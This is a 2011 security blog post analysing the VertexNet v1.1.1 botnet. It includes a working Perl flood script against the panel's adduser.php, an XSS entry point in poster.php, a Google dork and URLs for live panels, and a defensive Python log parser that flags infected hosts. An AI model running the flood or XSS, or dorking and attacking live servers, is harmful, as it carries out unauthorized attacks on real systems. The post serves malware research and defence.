Tuesday 17 May 2011

VertexNet v1.1.1 Loader Vulnerabilities





On the 15th I saw this sample: http://vxvault.siri-urz.net/ViriFiche.php?ID=9330



It appears to be a VertexNet bot after a short analysis.

VertexNet v1.1.1 Builder:

The malware calls home with 'V32' as user-agent:


Task check:




I will not do a full analysis, but it's relatively simple to understand how it works.
If you want to start malware reversing, I think VertexNet 1.1.1 is a good exercise.

Well, to return to the original subject, adduser.php is not protected against flood attacks.
So here is a short Perl script to exploit that:

#!/usr/bin/perl
# VertexNet v1.1.1 Flood Bots
# http://www.virustotal.com/file-scan/report.html?id=fd373a8f4adf29001d282b963f126f760afcf3e58117f6024b2d65a36d41f617-1305491791
# Xyl2k! :þ

use HTTP::Request;
use LWP::UserAgent;

# Panel registration script (local test install)
$URL = "http://localhost/Panel/adduser.php";

# The panel expects the bot's own user-agent
$useragent = LWP::UserAgent -> new();
$useragent -> agent('V32');

$try = 0;

while(1)
{
    # A random uid makes each request register as a new bot
    $rnd = rand();

    $request = HTTP::Request -> new(GET => $URL . '?uid={' . $rnd . '}&lan=127.0.0.1&cmpname=Xyl2k!&country=Fran.ais%20(France)%20+33&cc=FR&idle=0&ver=v1337');
    $response = $useragent -> request($request);

    # Count only the requests the panel accepted
    if ($response -> is_success)
    {
        $try++;
        print("[~] The fire day " . $try . "\n");
    }
}
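
Seen from the defender's side, the 'V32' user-agent and the adduser.php parameters above are enough to spot infected machines in proxy logs. The Python below is an added example, not code from the original post; the combined log layout, the panel.example host and the sample lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Indicators taken from the post: the 'V32' user-agent and the adduser.php query keys.
BOT_UA = "V32"
CHECKIN_KEYS = {"uid", "lan", "cmpname", "country", "cc", "idle", "ver"}

# Combined log format as written by a forward proxy (assumed layout).
LINE_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<url>\S+) [^"]*" (?P<status>\d{3}) \S+ '
    r'"(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

def classify(line):
    """Return (client, url, reasons) for a suspicious log line, else None."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None  # unparseable lines are skipped, not treated as hits
    parts = urlsplit(m["url"])
    keys = set(parse_qs(parts.query, keep_blank_values=True))
    reasons = []
    if m["ua"] == BOT_UA:
        reasons.append("user-agent")
    if parts.path.lower().endswith("/adduser.php") and CHECKIN_KEYS <= keys:
        reasons.append("checkin-url")  # still fires if a build changes the user-agent
    return (m["client"], m["url"], reasons) if reasons else None

def infected_clients(lines):
    """Map client IP -> sorted list of indicators seen for that client."""
    hits = {}
    for line in lines:
        res = classify(line)
        if res:
            hits.setdefault(res[0], set()).update(res[2])
    return {ip: sorted(r) for ip, r in hits.items()}

# Constructed sample proxy log lines (not real traffic).
_Q = "uid={0.42}&lan=10.0.0.5&cmpname=PC1&country=FR&cc=FR&idle=0&ver=v1.1.1"
SAMPLE = [
    f'10.0.0.5 - - [17/May/2011:10:00:01 +0000] "GET http://panel.example/Panel/adduser.php?{_Q} HTTP/1.1" 200 12 "-" "V32"',
    f'10.0.0.9 - - [17/May/2011:10:00:07 +0000] "GET http://panel.example/Panel/adduser.php?{_Q} HTTP/1.1" 200 12 "-" "Mozilla/5.0"',
    '10.0.0.7 - - [17/May/2011:10:01:00 +0000] "GET http://www.example.org/index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for ip, reasons in infected_clients(SAMPLE).items():
        print(ip, reasons)
```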

And poster.php also appears vulnerable to XSS (without being logged into the C&C):
http://localhost/Panel/poster.php?uid=XSS



VertexNet panels can easily be dorked in Google, something like intitle:"VertexNet v1.1"+intext:"Username :"
http://vertex.net23.net/VertexNet/
http://www.mynewurl.co.cc/vertex/Panel/
etc..
Who wants to send abuse? :)

To finish, here is the music of the builder :þ



